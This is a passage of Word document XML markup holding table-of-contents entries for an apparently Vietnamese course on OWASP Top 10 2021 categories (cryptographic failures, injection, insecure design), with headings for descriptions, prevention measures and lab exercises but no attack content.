              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="594ECA4C" w14:textId="11ED8D1F" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909829" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A02:2021 – Cryptographic Failures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909829 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EB3AB70" w14:textId="6F622AC6" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909830" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909830 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DC4BBC3" w14:textId="54493805" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909831" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909831 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F63D3AC" w14:textId="4086F700" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909832" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909832 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43BC514A" w14:textId="45ABABA0" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909833" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909833 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A875BA0" w14:textId="54D2D358" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909834" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909834 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25D2D780" w14:textId="1E837CE6" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909835" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909835 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24A22331" w14:textId="4850FB83" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909836" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A03:2021 – Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909836 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B2CD288" w14:textId="7A71B4EB" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909837" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909837 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0195B368" w14:textId="2A28158E" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909838" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909838 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="671043F7" w14:textId="3E5768D0" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909839" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909839 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="760C5ADB" w14:textId="2DFE3180" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909840" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909840 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53068017" w14:textId="7BDD06E1" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909841" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A04:2021 – Insecure Design</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909841 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B6CC800" w14:textId="7A2D436D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909842" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909842 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57417314" w14:textId="087E0304" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909843" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
